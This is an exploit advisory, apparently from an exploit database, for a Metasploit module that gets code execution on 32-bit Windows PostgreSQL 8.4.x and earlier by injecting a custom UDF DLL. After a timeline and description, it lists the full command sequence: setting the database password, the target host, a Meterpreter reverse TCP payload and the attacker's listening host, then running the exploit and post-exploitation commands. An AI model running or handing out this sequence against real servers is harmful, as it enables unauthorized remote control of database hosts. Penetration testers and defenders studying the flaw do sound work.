Timeline :

The vulnerability seem to exist since 2007 !
Vulnerability discovered and disclosed by Bernardo Damele the 2009-04-01
Metasploit PoC provided by todb the 2011-03-23

PoC provided by :

Bernardo Damele
todb

Reference(s) :

NONE

Affected version(s) :

All Microsoft Windows PostgreSQL, before or equal to 8.4.x 32-bit.

Tested on Windows XP SP3 with :

PostgreSQL 8.4.7

Description :

This module creates and enables a custom UDF (user defined function) on the target host via the UPDATE pg_largeobject method of binary injection. On default Microsoft Windows installations of PostgreSQL, the postgres service account may write to the Windows temp directory, and may source UDF DLL’s from there as well. PostgreSQL versions 8.2.x, 8.3.x, and 8.4.x on Microsoft Windows (32-bit) are valid targets for this module. NOTE: This module will leave a payload executable on the target system when the attack is finished, as well as the UDF DLL and the OID.

Commands :

use exploit/windows/postgres/postgres_payload
set PASSWORD test
set RHOST 192.168.178.63
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
getuid